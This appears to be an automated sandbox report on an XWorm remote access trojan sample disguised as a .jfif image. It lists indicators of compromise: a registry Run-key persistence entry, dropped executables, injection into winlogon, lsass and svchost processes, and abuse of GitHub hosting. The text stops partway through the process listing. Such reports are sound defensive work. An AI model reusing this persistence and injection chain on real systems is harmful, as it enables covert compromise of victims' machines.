Malware Analysis Report

2024-09-11 13:54

Sample ID 240615-labnwsvglb
Target download (1).jfif
SHA256 de395b853803c92eba20833640fab2d399d7c305666c49944d08c148a97779d9
Tags
xworm persistence rat trojan
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK Matrix
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral3
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral4
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

score
10/10

SHA256

de395b853803c92eba20833640fab2d399d7c305666c49944d08c148a97779d9

Threat Level: Known bad

The file download (1).jfif was found to be: Known bad.

Malicious Activity Summary

xworm persistence rat trojan

Suspicious use of NtCreateUserProcessOtherParentProcess

Detect Xworm Payload

Xworm

Blocklisted process makes network request

Downloads MZ/PE file

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Looks up external IP address via web service

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-15 09:19

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-15 09:19

Reported

2024-06-15 09:22

Platform

win10-20240404-en

Max time kernel

150s

Max time network

153s

Command Line

winlogon.exe

Signatures

Detect Xworm Payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description | Indicator | Process | Target
PID 2424 created 584 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe

Xworm

trojan rat xworm

Downloads MZ/PE file

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\svchost32.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\x4s.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4s = "C:\\Users\\Admin\\AppData\\Roaming\\x4s.exe" | C:\Users\Admin\AppData\Local\Temp\x4s.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | raw.githubusercontent.com | N/A | N/A
N/A | raw.githubusercontent.com | N/A | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | ip-api.com | N/A | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 2424 set thread context of 1144 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\Windows\svchost32.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

Enumerates system info in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sat, 15 Jun 2024 09:21:03 GMT" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={C2FBEA2B-F513-451D-B832-98713A0C28F0}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1718443262" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A (3 identical rows)
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A (4 identical rows)
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A (13 identical rows)
N/A | N/A | C:\Windows\system32\wbem\wmiprvse.exe | N/A (6 identical rows)
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A (38 identical rows)

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\svchost32.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\x4s.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeSecurityPrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeLoadDriverPrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeSystemtimePrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeBackupPrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeRestorePrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeShutdownPrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeUndockPrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeManageVolumePrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeAuditPrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeSecurityPrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeLoadDriverPrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeSystemtimePrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeBackupPrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeRestorePrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeShutdownPrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeUndockPrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeManageVolumePrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeSecurityPrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeLoadDriverPrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeSystemtimePrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeBackupPrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeRestorePrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeShutdownPrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeUndockPrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeManageVolumePrivilege | N/A | c:\windows\system32\svchost.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Token: SeAuditPrivilege | N/A | c:\windows\system32\svchost.exe | N/A (3 identical rows)
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4868 wrote to memory of 4180 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (2 identical rows)
PID 4180 wrote to memory of 824 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\svchost32.exe (2 identical rows)
PID 824 wrote to memory of 1020 | N/A | C:\Windows\svchost32.exe | C:\Users\Admin\AppData\Local\Temp\x4s.exe (2 identical rows)
PID 824 wrote to memory of 5064 | N/A | C:\Windows\svchost32.exe | C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe (3 identical rows)
PID 2424 wrote to memory of 1144 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe (8 identical rows)
PID 1144 wrote to memory of 584 | N/A | C:\Windows\System32\dllhost.exe | C:\Windows\system32\winlogon.exe
PID 1144 wrote to memory of 640 | N/A | C:\Windows\System32\dllhost.exe | C:\Windows\system32\lsass.exe
PID 1144 wrote to memory of 736 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 908 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1008 | N/A | C:\Windows\System32\dllhost.exe | C:\Windows\system32\dwm.exe
PID 1144 wrote to memory of 64 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 696 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 808 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1036 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1092 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1192 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1228 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1240 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1248 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1388 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1456 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1464 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1548 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1560 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1596 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1688 | N/A | C:\Windows\System32\dllhost.exe | C:\Windows\System32\svchost.exe
PID 1144 wrote to memory of 1744 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1788 | N/A | C:\Windows\System32\dllhost.exe | C:\Windows\System32\svchost.exe
PID 1144 wrote to memory of 1800 | N/A | C:\Windows\System32\dllhost.exe | C:\Windows\system32\svchost.exe
PID 1144 wrote to memory of 1876 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1888 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 1968 | N/A | C:\Windows\System32\dllhost.exe | C:\Windows\System32\spoolsv.exe
PID 1144 wrote to memory of 1344 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 2140 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 2352 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 2360 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 2372 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 2400 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 2608 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 2668 | N/A | C:\Windows\System32\dllhost.exe | C:\Windows\sysmon.exe
PID 1144 wrote to memory of 2688 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 2712 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 2768 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 2848 | N/A | C:\Windows\System32\dllhost.exe | C:\Windows\system32\wbem\unsecapp.exe
PID 1144 wrote to memory of 3192 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\sihost.exe
PID 1144 wrote to memory of 3208 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 3288 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\taskhostw.exe
PID 1144 wrote to memory of 3328 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 3472 | N/A | C:\Windows\System32\dllhost.exe | C:\Windows\Explorer.EXE
PID 1144 wrote to memory of 3972 | N/A | C:\Windows\System32\dllhost.exe | C:\Windows\System32\RuntimeBroker.exe
PID 1144 wrote to memory of 4192 | N/A | C:\Windows\System32\dllhost.exe | C:\Windows\system32\DllHost.exe
PID 1144 wrote to memory of 5004 | N/A | C:\Windows\System32\dllhost.exe | c:\windows\system32\svchost.exe

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k dcomlaunch -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s gpsvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Schedule

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s nsi

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Themes

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s EventSystem

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s UserManager

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s SENS

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s NlaSvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k appmodel -s StateRepository

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer

c:\windows\system32\svchost.exe

